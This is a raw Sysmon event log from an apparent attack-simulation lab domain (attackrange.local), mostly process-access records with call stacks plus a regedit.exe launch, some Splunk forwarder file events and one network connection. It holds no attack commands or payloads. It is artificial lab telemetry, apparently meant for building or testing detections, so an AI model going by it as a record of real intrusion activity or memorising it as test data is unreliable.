08:00:36.718{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.718{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.718{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F6A4-60EB-A07D-00000000CF01}7440C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.718{466BC892-32D3-60E8-770B-00000000CF01}63563140C:\Windows\Explorer.EXE{466BC892-F6A4-60EB-A07D-00000000CF01}7440C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+3d503|C:\Windows\System32\SHELL32.dll+3d3cb|C:\Windows\System32\SHELL32.dll+3cce7|C:\Windows\System32\SHELL32.dll+3c9ac|C:\Windows\System32\SHELL32.dll+122467|C:\Windows\System32\SHELL32.dll+1223c5 154100x80000000000000001052056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.687{466BC892-F6A4-60EB-A07D-00000000CF01}7440C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXE"C:\Windows\regedit.exe" C:\Users\bob\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001052055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.219{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61AC30FF82D8E122BB8302F0FBF17D5F,SHA256=169ED99AF4D518C840A540E86226196C97E50AD6F92AC98A607621C8779D212F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809105Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:37.465{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D87309E393721177A3F240DB66CDAEE,SHA256=0A7263E6FF4397BBE1BA235C70FD6AE864CEF504320C576AADD1CE3EA0C35E80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.750{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8747C465A75458984FE2E5A23E2AD370,SHA256=308C3A1CF4CE39501919F5BB03B879F20F8C2395F1B3772AB0A870028C37AF9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.750{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93CF72DAEF49F1A44EFC0DF9D3456C94,SHA256=6FC18F2166A6AF940D3508507DCF10FAD4508C873842725A66F341B229C46155,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:29.669{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51148-false10.0.1.12-8000- 10341000x80000000000000001052115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.450{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 